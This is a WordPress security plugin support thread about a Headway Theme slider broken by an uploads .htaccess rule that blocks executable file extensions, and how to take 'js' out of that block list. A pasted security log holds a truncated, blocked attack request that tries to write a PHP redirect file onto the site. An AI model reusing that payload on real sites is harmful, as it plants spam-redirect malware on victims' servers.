Headway Theme Visual Editor, Slider 403 error

[AITpro Admin]

Issue/Problem:  Unable to access the Headway Theme Visual Editor.  UAEG blocking js scripts that the Headway Theme stores in the WordPress uploads folder – /wp-content/uploads/headway/cache/block-dynamic-js-layout-front_page-8df6f84.js

Solution:  Go to the B-Core Edit/Upload/Download tab page >>> Click the Your Current Uploads htaccess File tab.  Remove/delete the js file extension from being blocked in the uploads folder by editing the uploads .htaccess file directly and save your changes. The js| code to delete/remove is highlighted in yellow in the example code below.

# FORBID THESE FILE EXTENSIONS FROM BEING ACCESSED OR EXECUTED REMOTELY
<FilesMatch "\.(7z|as|bat|bin|cgi|chm|chml|class|cmd|com|command|dat|db|db2|db3|dba|dll|DS_Store|exe|gz|hta|htaccess|htc|htm|html|htx|idc|ini|ins|isp|jar|jav|java|js|jse|jsfl|json|jsp|jsx|lib|lnk|out|php|phps|php5|php4|php3|phtml|phpt|pl|py|pyd|pyc|pyo|rar|shtm|shtml|sql|swf|sys|tar|taz|tgz|tpl|vb|vbe|vbs|war|ws|wsf|xhtml|xml|z|zip)$">

[John Evans]

[Topic has been merged into this relevant Topic]
I use the Headway Theme and the slider on the homepage isn’t working since installing BPS Pro and I “think” specifically after activating UAEG. Any thoughts on how to fix this? Thanks.

[AITpro Admin]

@ John Evans – This similar/relevant Forum Topic is very old and I updated the Title to include a “Slider” problem.  The new method to fix this problem is to use UAEG Custom Code.  For step #2 below remove/delete:  js| from your UAEG htaccess code after you have copied it to the Custom Code UAEG text box.

UAEG htaccess File Custom Code Steps
1. Copy and paste your entire Uploads .htaccess file code from the “Your Current Uploads htaccess File” tab on the htaccess File Editor page into the CUSTOM CODE UAEG text box.
2. Edit/modify/customize your UAEG htaccess code.
3. Click the Save UAEG Custom Code button to save your UAEG custom code.
4. Go to the Security Modes page and click the UAEG BulletProof Mode Activate button.

[John Evans]

[Topic has been merged into this relevant Topic]
I have two websites that were hacked on GoDaddy Managed WordPress Hosting for clients of mine. Both had file injections in the root folder like marriage.php, setup,php, etc. I actually created new hosting accounts and rebuilt the sites onto the new system. I also decided to install BPSPro on another site that hasn’t been hacked. I keep getting security logs for all of these sites. I am checking them of course as I’m trying to learn the plugin and more about the security side (btw did my own hosting for 18 years including WP and never had a hacked website until partnering with someone). Anyways my main question is what should I do with these logs? Do I ignore them as one for instance is a constant attempt to access one of the previously injected files that isn’t there anymore. I’m going to paste some entries from the logs below…

Also on a separate issue the JTC addon shows in white when hovering instead of black letters or it just isn’t there.

[403 POST Request: December 5, 2015 - 3:23 pm]
Event Code: PFWR-PSBR-HPR
Solution: http://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 77.70.43.79
Host Name: 77.70.43.79
SERVER_PROTOCOL: HTTP/1.0
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: POST
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/visual-columns/sys.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
REQUEST BODY: url=http://tripsbymike.com/wp-content/plugins/visual-columns/sys.php&login=file_put_contents&password=../../../wait.php&re_password=%3C?php%0D%0A@set_time_limit(0);%0D%0A@error_reporting(0);%0D%0A@ini_set('max_execution_time',%200);%0D%0A$links_str%20=%20'http://threivetrack.com/?utm_source=1%26sec=61ee609490%26sleep_id=2224dc49a861;http://omrcc.net/?a=370957%26c=wl_con';%0D%0A%0D%0A$redir_template%20=%20'%3Cmeta%20http-equiv=%22refresh%22%20content=%222;%20url=%25s%22%3E';%0D%0A%0D%0A$links%20=

[403 GET Request: December 3, 2015 - 4:54 pm]
Event Code: UAEGWR-HPR
Solution: http://forum.ait-pro.com/forums/topic/uploads-anti-exploit-guard-uaeg-read-me-first/
REMOTE_ADDR: 96.10.226.69
Host Name: rrcs-96-10-226-69.midsouth.biz.rr.com
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER: http://elsfreight.com/
REQUEST_URI: /wp-content/uploads/headway/cache/block-dynamic-js-layout-front_page-0b92f3b.js?ver=4.3.1
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586

[AITpro Admin]

The first Security Log entry is a blocked hacking attempt.  The second log entry is a known Headway Theme issue/problem.  See this solution in this Forum Topic.  For the JTC issue see this Forum Topic on Go Daddy Managed WordPress Hosting limitations and restrictions:  http://forum.ait-pro.com/forums/topic/gdmw/

[John Evans]

I copied and pasted the following per your instructions (not sure what I’m supposed to modify) and the system said my uploads folder is now protected but the slider still doesn’t work…
[default UAEG htaccess file/code deleted]

[AITpro Admin]

Edit your UAEG htaccess code and delete js| from your code.  The example code below shows js| highlighted in yellow.

<FilesMatch "\.(7z|as|bat|bin|cgi|chm|chml|class|cmd|com|command|dat|db|db2|db3|dba|dll|DS_Store|exe|gz|hta|htaccess|htc|htm|html|htx|idc|ini|ins|isp|jar|jav|java|js|jse|jsfl|json|jsp|jsx|lib|lnk|out|php|phps|php5|php4|php3|phtml|phpt|pl|py|pyd|pyc|pyo|rar|shtm|shtml|sql|swf|sys|tar|taz|tgz|tpl|vb|vbe|vbs|war|ws|wsf|xhtml|xml|z)$">

[John Evans]

Great! It worked but note to others I had to flush the GoDaddy cache to see results. I test these things out of a private browsing window also FYI.  Can you update BPS Pro to do this automatically like you do with some other plugins? Or is there a way to maybe create an export file for the types of sites I build. I’m going to be incorporating this along with GoDaddy Managed into all sites I build unless the client protests.

[AITpro Admin]

You can use the Custom Code Export|Import tools to Export all Root, wp-admin and UAEG code customizations and then Import those customizations into another website.

[John Evans]

Do you have an option to pay you to include these mods with the pro plugin setup? I use Headway for all sites and it is a fairly widely used framework.

[AITpro Admin]

The “mod” stuff is already available and built-in using the BPS Custom Code feature, which allows you to customize any/all htaccess code any way you would like to customize it for any/all possible needs.  It would not be good coding design to “hard code” something specifically for the Headway Theme.  Also since doing the UAEG htaccess code customization for the Headway Theme only takes a few minutes to complete there is not really any sort of reason to do this any other way.  And of course since you can Export and Import Custom Code then adding your customizations to other sites would take about 1 minute to complete.  If you have a better way of doing this then I am all ears and open to any ideas/suggestions.

[John Evans]

Not a big deal. Was really just a question and was willing to pay to have it done if needed. I just thought I noticed your plugin automatically adds whitelisting for Gravity Forms, Easy Twitter Widget and a few others so I thought it could do the same for Headway. No big deal honestly.

[AITpro Admin]

Hmm didn’t think of that approach from the perspective of how Plugin Firewall AutoPilot Mode automatically creates whitelist rules.  That would actually be smart and flexible design.  I don’t think there is a huge demand for doing the same thing with UAEG as what is being done with Plugin Firewall AutoPilot Mode, but I think that adding something like this to UAEG is very doable anyway.  I have created a Scheduled Task for this, which will go through Review and then if it passes will be created/added to BPS Pro.  Personally I think it is a good idea. 😉

[Author]

Posts